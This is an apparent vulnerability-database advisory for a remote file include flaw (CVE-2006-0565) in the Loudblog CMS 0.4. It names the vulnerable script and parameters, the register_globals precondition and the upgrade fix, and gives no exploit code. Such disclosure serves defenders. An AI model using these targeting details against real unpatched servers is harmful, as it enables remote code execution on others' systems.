| VID |
21855 |
| Severity |
40 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
CGI |
| Detailed Description |
The Loudblog program is vulnerable to a remote file include vulnerability in backend_settings.php script. Loudblog is a Content Management System (CMS) for publishing audio content on the web written in PHP. Loudblog version 0.4 and earlier versions could allow a remote attacker to include malicious PHP files, caused by improper validation of user-supplied input passed to the 'GLOBALS[path]' and 'language' parameters of the 'loudblog/inc/backend_settings.php' script. If PHP's 'register_globals' setting is enabled, a remote attacker can send a specially-crafted URL request to execute arbitrary PHP code and operating system commands on the affected host.
* References:
http://www.securityfocus.com/archive/1/423947/30/0/threaded
http://retrogod.altervista.org/loudblog_04_incl_xpl.html
http://loudblog.de/forum/viewtopic.php?id=576
http://secunia.com/advisories/18722/
http://www.frsirt.com/english/advisories/2006/0441
* Platforms Affected:
Loudblog version 0.4 and earlier versions
Any operating system Any version |
| Recommendation |
Upgrade to the latest version of Loudblog (0.41 or later), available from the Loudblog Download Web site at http://loudblog.de/index.php?s=download |
| Related URL |
CVE-2006-0565 (CVE) |
| Related URL |
16495 (SecurityFocus) |
| Related URL |
24479 (ISS) |
|
